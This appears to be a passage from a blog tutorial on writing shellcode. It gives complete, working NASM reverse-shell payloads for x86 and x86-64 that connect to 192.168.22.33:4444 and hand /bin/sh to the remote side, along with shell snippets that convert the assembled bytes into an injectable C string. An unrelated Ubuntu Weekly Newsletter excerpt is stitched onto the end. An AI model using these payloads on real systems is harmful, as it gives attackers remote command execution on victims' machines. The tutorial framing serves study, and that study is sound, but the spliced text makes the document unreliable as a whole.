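Once the assembly below is built as a flat binary (e.g. with `nasm -f bin`), the raw machine code still has to be turned into a byte string the exploit can inject. A quick sketch of that conversion step, using a few placeholder bytes in place of the real assembled output (demo.bin is hypothetical):

```shell
# Placeholder bytes standing in for assembled shellcode; a real flat
# binary would come from something like `nasm -f bin shell.asm`.
printf '\x31\xc0\x50\x68' > demo.bin
# Convert each byte to a \xNN escape, ready to paste into a C char array.
od -An -tx1 demo.bin | tr -s ' ' '\n' | sed '/^$/d; s/^/\\x/' | tr -d '\n'; echo
# prints \x31\xc0\x50\x68
```

Where available, `xxd -i demo.bin` produces a ready-made C array directly.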

Reverse Shell in x86

My shellcode below will be written with the intent of being as clear as possible as a learning instrument. Consequently, it is neither the shortest possible shellcode, nor is it free of “bad characters” (null bytes, newlines, etc.). It is also written as NASM assembly.
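Since bad characters were just mentioned: a quick way to audit an assembled flat binary for NUL bytes is to scan its hex dump. A sketch using placeholder bytes (demo.bin is hypothetical; a real check would run against the nasm output):

```shell
# demo.bin stands in for assembled shellcode; this sample deliberately
# contains a NUL byte so the check fires.
printf '\x31\xc0\x00\x50' > demo.bin
# Look for a "00" byte in the hex dump.
if od -An -tx1 demo.bin | grep -q ' 00'; then
  echo "contains NUL bytes (will break string-based injection)"
else
  echo "clean"
fi
```

The same pipeline generalizes to other bad characters (e.g. grep for ' 0a' to find newlines).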

; Do the steps to setup a socket (1)
; SYS_socket = 1
mov ebx, 1
; Setup the arguments to socket() on the stack.
push 0 ; Flags = 0
push 1 ; SOCK_STREAM = 1
push 2 ; AF_INET = 2
; Move a pointer to these values to ecx for socketcall.
mov ecx, esp
; We're calling SYS_SOCKETCALL
mov eax, 0x66
; Get the socket
int 0x80

; Time to setup the struct sockaddr_in (2), (3)
; push the address so it ends up in network byte order
; 192.168.22.33 == 0xC0A81621
push 0x2116a8c0
; push the port as a short in network-byte order
; 4444 = 0x115c
mov ebx, 0x5c11
push bx
; push the address family, AF_INET = 2
mov ebx, 0x2
push bx

; Let's establish the connection (4)
; Save address of our struct
mov ebx, esp
; Push size of the struct
push 0x10
; Push address of the struct
push ebx
; Push the socketfd
push eax
; Put the pointer into ecx
mov ecx, esp
; We're calling SYS_CONNECT = 3 (via SYS_SOCKETCALL)
mov ebx, 0x3
; Preserve sockfd
push eax
; Call SYS_SOCKETCALL
mov eax, 0x66
; Make the connection
int 0x80

; Let's duplicate the FDs from our socket. (5)
; Load the sockfd
pop ebx
; STDERR
mov ecx, 2
; Calling SYS_DUP2 = 0x3f
mov eax, 0x3f
; Syscall!
int 0x80
; mov to STDOUT
dec ecx
; Reload eax
mov eax, 0x3f
; Syscall!
int 0x80
; mov to STDIN
dec ecx
; Reload eax
mov eax, 0x3f
; Syscall!
int 0x80

; Now time to execve (6)
; push "/bin/sh\0" on the stack
push 0x68732f
push 0x6e69622f
; preserve filename
mov ebx, esp
; array of arguments
xor eax, eax
push eax
push ebx
; pointer to array in ecx
mov ecx, esp
; null envp
xor edx, edx
; call SYS_execve = 0xb
mov eax, 0xb
; execute the shell!
int 0x80

Reverse Shell in x86-64

This will be very similar to the x86 shellcode, but adjusted for x86-64. I will use the proper x86-64 system calls and 64-bit registers where possible.

; Do the steps to setup a socket (1)
; Setup the arguments to socket() in appropriate registers
xor rdx, rdx ; Flags = 0
mov rsi, 1   ; SOCK_STREAM = 1
mov rdi, 2   ; AF_INET = 2
; We're calling SYS_socket
mov rax, 41
; Get the socket
syscall

; Time to setup the struct sockaddr_in (2), (3)
; push the address so it ends up in network byte order
; 192.168.22.33 == 0xC0A81621
push 0x2116a8c0
; push the port as a short in network-byte order
; 4444 = 0x115c
mov bx, 0x5c11
push bx
; push the address family, AF_INET = 2
mov bx, 0x2
push bx

; Let's establish the connection (4)
; Save address of our struct
mov rsi, rsp
; size of the struct
mov rdx, 0x10
; Our socket fd
mov rdi, rax
; Preserve sockfd
push rax
; Call SYS_connect
mov rax, 42
; Make the connection
syscall

; Let's duplicate the FDs from our socket. (5)
; Load the sockfd
pop rdi
; STDERR
mov rsi, 2
; Calling SYS_dup2 = 0x21
mov rax, 0x21
; Syscall!
syscall
; mov to STDOUT
dec rsi
; Reload rax
mov rax, 0x21
; Syscall!
syscall
; mov to STDIN
dec rsi
; Reload rax
mov rax, 0x21
; Syscall!
syscall

; Now time to execve (6)
; push "/bin/sh\0" on the stack
push 0x68732f
push 0x6e69622f
; preserve filename
mov rdi, rsp
; array of arguments
xor rdx, rdx
push rdx
push rdi
; pointer to array in rsi
mov rsi, rsp
; call SYS_execve = 59
mov rax, 59
; execute the shell!
syscall

Conclusion

The structural similarities between the two assembly implementations and the C source code should be fairly evident. When I write shellcode, I usually write out the list of steps involved, then write a version in C, and finally translate it into the assembly for the shellcode. I’m a bit of a control freak, so whenever I need custom shellcode, I go straight to the assembly.

Let me know if there’s a particular shellcode payload you’re interested in me covering or if you have feedback on the style or usefulness of these posts.

The Fridge: Ubuntu Weekly Newsletter Issue 551

Mon, 29/10/2018 - 9:34pm

Welcome to the Ubuntu Weekly Newsletter, Issue 551 for the week of October 21 – 27, 2018. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License
